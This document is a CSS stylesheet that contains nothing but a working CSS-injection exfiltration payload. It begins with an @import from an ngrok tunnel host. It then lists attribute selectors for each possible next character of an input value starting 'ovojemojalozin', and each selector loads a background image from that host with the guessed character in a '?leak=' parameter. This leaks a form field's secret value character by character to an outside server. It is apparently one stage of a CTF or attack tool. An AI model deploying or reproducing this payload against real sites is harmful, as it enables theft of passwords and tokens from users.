@import url("http://bc0a37bcf1d5.ngrok.io/?l=16");
input[value="ovojemojalozin!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.7723560455784131");}
input[value="ovojemojalozin\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.37679619964868527");}
input[value="ovojemojalozin#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.13117545277608378");}
input[value="ovojemojalozin$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.19851306676204428");}
input[value="ovojemojalozin%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.046058523595051915");}
input[value="ovojemojalozin&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.2699316173982671");}
input[value="ovojemojalozin'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.1270308601647392");}
input[value="ovojemojalozin("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.3941286169939988");}
input[value="ovojemojalozin)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.8593568136093481");}
input[value="ovojemojalozin*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.027593948963430925");}
input[value="ovojemojalozin+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.7845980370960521");}
input[value="ovojemojalozin,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.4848928086693649");}
input[value="ovojemojalozin-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.6113078687636522");}
input[value="ovojemojalozin."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.09951436738426445");}
input[value="ovojemojalozin/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.5708059022442473");}
input[value="ovojemojalozin0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.7454649503384729");}
input[value="ovojemojalozin1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.3785241665887955");}
input[value="ovojemojalozin2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.2994732016957071");}
input[value="ovojemojalozin3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.6125976055736622");}
input[value="ovojemojalozin4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.4613002961845485");}
input[value="ovojemojalozin5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.0852762191849159");}
input[value="ovojemojalozin6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.18544845987320624");}
input[value="ovojemojalozin7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.9293536406654272");}
input[value="ovojemojalozin8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.8459543168257455");}
input[value="ovojemojalozin9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.6451432217023161");}
input[value="ovojemojalozin:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.7213889709224486");}
input[value="ovojemojalozin;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.17525506965410664");}
input[value="ovojemojalozin<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.8823784389522056");}
input[value="ovojemojalozin="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.09300652965041767");}
input[value="ovojemojalozin>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.9666236904715453");}
input[value="ovojemojalozin?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.5581526944902546");}
input[value="ovojemojalozin@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.5051934644106404");}
input[value="ovojemojalozinA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.8118251378924439");}
input[value="ovojemojalozinB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.6643103787566995");}
input[value="ovojemojalozinC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.9744222301595225");}
input[value="ovojemojalozinD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.7576927458803755");}
input[value="ovojemojalozinE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.5331141664437447");}
input[value="ovojemojalozinF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.14541249130741307");}
input[value="ovojemojalozinG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.5237022536469096");}
input[value="ovojemojalozinH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.39030361301888905");}
input[value="ovojemojalozinI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.9520544581302548");}
input[value="ovojemojalozinJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.4517764895205303");}
input[value="ovojemojalozinK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.4763789081837242");}
input[value="ovojemojalozinL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.10042668016803669");}
input[value="ovojemojalozinM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.5424710678327889");}
input[value="ovojemojalozinN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.8015195879937651");}
input[value="ovojemojalozinO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.8559985792091627");}
input[value="ovojemojalozinP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.6624392440527673");}
input[value="ovojemojalozinQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.07489757525207064");}
input[value="ovojemojalozinR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.28320668522743353");}
input[value="ovojemojalozinS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.0807903831167498");}
input[value="ovojemojalozinT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.6803369374153139");}
input[value="ovojemojalozinU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.36426159932132784");}
input[value="ovojemojalozinV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.021021554596382996");}
input[value="ovojemojalozinW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.49654473627813767");}
input[value="ovojemojalozinX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.2892091493691151");}
input[value="ovojemojalozinY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.05253949809328007");}
input[value="ovojemojalozinZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.6053375368694087");}
input[value="ovojemojalozin["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.07973558036749262");}
input[value="ovojemojalozin\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.09671072453149132");}
input[value="ovojemojalozin]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.7860963657351601");}
input[value="ovojemojalozin^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.8190462758042449");}
input[value="ovojemojalozin_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.5504043823885967");}
input[value="ovojemojalozin`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.2729167454544037");}
input[value="ovojemojalozina"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.5460526706589441");}
input[value="ovojemojalozinb"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.571041801687691");}
input[value="ovojemojalozinc"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.8137094210880527");}
input[value="ovojemojalozind"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.3279256884960855");}
input[value="ovojemojalozine"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.022621213165347376");}
input[value="ovojemojalozinf"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.9882242354517317");}
input[value="ovojemojalozing"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.2639404300476029");}
input[value="ovojemojalozinh"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.3195657715204594");}
input[value="ovojemojalozini"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.9673025581703449");}
input[value="ovojemojalozinj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.47114303012688286");}
input[value="ovojemojalozink"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.16046300754599896");}
input[value="ovojemojalozinl"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.6378550446548554");}
input[value="ovojemojalozinm"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.6080482162418266");}
input[value="ovojemojalozinn"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.052446561520641755");}
input[value="ovojemojalozino"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.6227769074226723");}
input[value="ovojemojalozinp"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.8659206235894872");}
input[value="ovojemojalozinq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.440521247560264");}
input[value="ovojemojalozinr"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.6597634579651817");}
input[value="ovojemojalozins"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.2014660824059591");}
input[value="ovojemojalozint"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.18528537462249028");}
input[value="ovojemojalozinu"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.1511255722556999");}
input[value="ovojemojalozinv"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.6054056774632681");}
input[value="ovojemojalozinw"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.9706216475661544");}
input[value="ovojemojalozinx"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.3053930958763391");}
input[value="ovojemojaloziny"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.1429708970661876");}
input[value="ovojemojalozinz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.7083834259611381");}
input[value="ovojemojalozin{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.48539406627199333");}
input[value="ovojemojalozin|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.09158631562896202");}
input[value="ovojemojalozin}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.5885998036333928");}
input[value="ovojemojalozin~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.3175067088892727");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.28561062165389917");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7272314694088606");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.914059095733198");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.789770760671255");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.03160967118956548");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6440208447983327");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.46201951721483914");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.018142908533525848");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2836776049784633");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.28804516953371495");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.01849401132058648");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4182699232925058");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8238583127481014");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.03978150057657048");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6834832029635205");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7393190428593428");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.804412335979471");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7910443126331832");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5923880208021748");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5332943462699276");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.11004983048036965");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4055283465276829");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.28109062719429456");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8693919274809794");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.146254367370088");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.993620488150424");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3478502605745326");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.11218532729521646");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5307889218091149");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2568260522141055");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5941162863290368");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3362451795153296");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.36327715257883986");}
input[value="ovojemojalozin "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.9414654746134075");}
input[value="ovojemojalozin¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.8610588633908094");}
input[value="ovojemojalozin¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.05777073843591296");}
input[value="ovojemojalozin£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.1732178907620665");}
input[value="ovojemojalozin¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.17725846871604545");}
input[value="ovojemojalozin¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.13622723557411232");}
input[value="ovojemojalozin¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.289372492775007");}
input[value="ovojemojalozin§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.3945013563576054");}
input[value="ovojemojalozin¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.7616862836879412");}
input[value="ovojemojalozin©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.578643826396471");}
input[value="ovojemojalozinª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.006614393274407382");}
input[value="ovojemojalozin«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.9998956207095993");}
input[value="ovojemojalozin¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.8511255034359244");}
input[value="ovojemojalozin­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.8504478677902365");}
input[value="ovojemojalozin®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.6097199430951001");}
input[value="ovojemojalozin¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.682966491633737");}
input[value="ovojemojalozin°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.16842448902133667");}
input[value="ovojemojalozin±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.8143850328808324");}
input[value="ovojemojalozin²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.2186136750450951");}
input[value="ovojemojalozin³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.13975271711826198");}
input[value="ovojemojalozin´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.48799187815968015");}
input[value="ovojemojalozinµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.9920934848858531");}
input[value="ovojemojalozin¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.6983183382498559");}
input[value="ovojemojalozin·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.24473815594581017");}
input[value="ovojemojalozin¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.8460926462445189");}
input[value="ovojemojalozin¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.45732681010860166");}
input[value="ovojemojalozinº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.08345871692912632");}
input[value="ovojemojalozin»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.8805423656924001");}
input[value="ovojemojalozin¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.9601842273182724");}
input[value="ovojemojalozin½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.9727040348232188");}
input[value="ovojemojalozin¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.9086930585530715");}
input[value="ovojemojalozin¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.4055216700272497");}
input[value="ovojemojalozinÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.5894103014189425");}
input[value="ovojemojalozinÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.6411135732121251");}
input[value="ovojemojalozinÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.3115259690175529");}
input[value="ovojemojalozinÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.5552759037094739");}
input[value="ovojemojalozinÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.710981432304346");}
input[value="ovojemojalozinÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.1740840724807009");}
input[value="ovojemojalozinÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.41032885870297586");}
input[value="ovojemojalozinÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.04832466789492029");}
input[value="ovojemojalozinÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.01625891272573443");}
input[value="ovojemojalozinÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.9144131017549062");}
input[value="ovojemojalozinÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.5330139852544926");}
input[value="ovojemojalozinË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.2753758044852941");}
input[value="ovojemojalozinÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.4510879748296215");}
input[value="ovojemojalozinÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.8450478530192975");}
input[value="ovojemojalozinÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.8561807238002281");}
input[value="ovojemojalozinÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.5983116248586722");}
input[value="ovojemojalozinÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.11248300657969668");}
input[value="ovojemojalozinÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.1738927983444365");}
input[value="ovojemojalozinÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.05856061119416678");}
input[value="ovojemojalozinÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.3999409089400927");}
input[value="ovojemojalozinÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.6635462849433635");}
input[value="ovojemojalozinÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.14336012665219888");}
input[value="ovojemojalozinÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.10327179953630461");}
input[value="ovojemojalozin×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.11619902945934268");}
input[value="ovojemojalozinØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.2641427834120018");}
input[value="ovojemojalozinÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.05865777636063574");}
input[value="ovojemojalozinÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.8064366552757372");}
input[value="ovojemojalozinÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.8173160622788505");}
input[value="ovojemojalozinÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.73180541912117");}
input[value="ovojemojalozinÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.6245375055037856");}
input[value="ovojemojalozinÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.8531588062334794");}
input[value="ovojemojalozinß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.23106920754818194");}
input[value="ovojemojalozinà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.7704173775003369");}
input[value="ovojemojaloziná"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.8487521628417589");}
input[value="ovojemojalozinâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.7032018424019493");}
input[value="ovojemojalozinã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.19735659083568136");}
input[value="ovojemojalozinä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.44883691654004876");}
input[value="ovojemojalozinå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.47206696417139926");}
input[value="ovojemojalozinæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.25051399987867073");}
input[value="ovojemojalozinç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.926200546891621");}
input[value="ovojemojalozinè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.33606868648929145");}
input[value="ovojemojaloziné"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.04163702403031522");}
input[value="ovojemojalozinê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.9548152207756935");}
input[value="ovojemojalozinë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.01230840574680725");}
input[value="ovojemojalozinì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.3110510440240366");}
input[value="ovojemojaloziní"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.29066121712438275");}
input[value="ovojemojalozinî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.7727663737314721");}
input[value="ovojemojalozinï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.5287364760145952");}
input[value="ovojemojalozinð"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.7130730239739234");}
input[value="ovojemojalozinñ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.9096417724922798");}
input[value="ovojemojalozinò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.9255879784958936");}
input[value="ovojemojalozinó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.31204168145805244");}
input[value="ovojemojalozinô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.13033959003195905");}
input[value="ovojemojalozinõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.1587673601089541");}
input[value="ovojemojalozinö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.43674639133610915");}
input[value="ovojemojalozin÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.8433681793031198");}
input[value="ovojemojalozinø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.7230226612691659");}
input[value="ovojemojalozinù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.1817646222533409");}
input[value="ovojemojalozinú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.4605436319348708");}
input[value="ovojemojalozinû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.5246198498177774");}
input[value="ovojemojalozinü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.5829090534896479");}
input[value="ovojemojaloziný"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.9529015876811324");}
input[value="ovojemojalozinþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.6753671857123604");}
input[value="ovojemojalozinÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.45915016730124547");}
